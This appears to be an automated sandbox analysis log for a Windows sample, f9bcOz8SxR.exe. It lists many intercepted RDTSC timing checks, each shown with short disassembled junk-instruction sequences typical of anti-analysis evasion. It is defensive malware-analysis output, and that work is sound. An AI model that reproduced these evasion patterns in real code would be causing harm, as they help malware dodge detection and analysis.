Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A1DBC second address: 10A1DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A1F5D second address: 10A1F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A1F61 second address: 10A1F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A21DF second address: 10A21EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A21EA second address: 10A21EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A21EF second address: 10A21F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A21F7 second address: 10A2224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F6184CCBA7Dh 0x0000000f pop ecx 0x00000010 jmp 00007F6184CCBA85h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A2224 second address: 10A2234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F6184834896h 0x0000000a je 00007F6184834896h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A2234 second address: 10A2244 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6184CCBA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A2244 second address: 10A2248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A239D second address: 10A23A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A5554 second address: 10A5572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F61848348A5h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A52BC second address: 10A52C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A52C2 second address: 10A52CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10A52CF second address: 10A52D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10AA955 second address: 10AA963 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10AA963 second address: 10AA967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10AC3B9 second address: 10AC3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10AC3BD second address: 10AC3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10AC3C1 second address: 10AC3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B6FD8 second address: 10B6FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B65DF second address: 10B65F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6184834896h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007F618483489Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B65F9 second address: 10B65FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B65FD second address: 10B6620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F61848348A7h 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B68E7 second address: 10B68FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B6BA8 second address: 10B6BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10B6BAC second address: 10B6BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BE84D second address: 10BE86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F61848348A5h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BED65 second address: 10BED6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BED6D second address: 10BED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BED71 second address: 10BED75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BED75 second address: 10BED99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F61848348A4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BED99 second address: 10BED9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BED9D second address: 10BEDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEDA1 second address: 10BEDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEDA9 second address: 10BEDCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F618483489Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF11 second address: 10BEF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF17 second address: 10BEF21 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6184834896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF21 second address: 10BEF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF26 second address: 10BEF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF2E second address: 10BEF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F6184CCBA7Fh 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F6184CCBA76h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF55 second address: 10BEF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF59 second address: 10BEF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F6184CCBA76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF67 second address: 10BEF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF6B second address: 10BEF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F6184CCBA82h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BEF79 second address: 10BEF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BF217 second address: 10BF223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BF223 second address: 10BF22F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F6184834896h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BF22F second address: 10BF249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BFA72 second address: 10BFA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6184834896h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BFA7D second address: 10BFA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA7Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BFA8B second address: 10BFAC8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6184834896h 0x00000008 jmp 00007F61848348A7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F61848348A7h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C01DD second address: 10C01E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C01E1 second address: 10C01E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C01E7 second address: 10C0215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F6184CCBA76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6184CCBA7Fh 0x00000015 jmp 00007F6184CCBA7Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C0215 second address: 10C0219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BDD66 second address: 10BDD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BDD70 second address: 10BDD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10BDD74 second address: 10BDD83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007F6184CCBA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C6207 second address: 10C620D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C620D second address: 10C6212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C5C1E second address: 10C5C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C5C24 second address: 10C5C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C5C29 second address: 10C5C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b js 00007F6184834896h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C5C4B second address: 10C5C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C5C51 second address: 10C5C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10C7883 second address: 10C7887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D1A58 second address: 10D1A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D4591 second address: 10D45AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6184CCBA87h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D45AF second address: 10D45BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F618483489Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D45BE second address: 10D45CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F6184CCBA76h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D45CC second address: 10D45EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D45EE second address: 10D45F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D45F2 second address: 10D45F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10D45F8 second address: 10D4615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6184CCBA87h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10DA18B second address: 10DA191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10DA191 second address: 10DA195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10DA195 second address: 10DA1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10DA1A1 second address: 10DA1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10DA1A5 second address: 10DA1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7BE4 second address: 10E7BEE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6184CCBA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7BEE second address: 10E7C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F6184834896h 0x0000000d jnl 00007F6184834896h 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 jo 00007F6184834896h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7C0D second address: 10E7C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7C17 second address: 10E7C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7A7E second address: 10E7A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7A89 second address: 10E7AAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007F61848348A2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10E7AAF second address: 10E7AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10F087F second address: 10F0889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6184834896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF3F8 second address: 10EF411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jbe 00007F6184CCBA7Ch 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF411 second address: 10EF417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF69A second address: 10EF6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6184CCBA76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF7FB second address: 10EF7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF7FF second address: 10EF812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EF812 second address: 10EF817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFAD4 second address: 10EFAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFAD8 second address: 10EFAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFC23 second address: 10EFC27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 10EFC27 second address: 10EFC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F618483489Ch 0x0000000f rdtsc
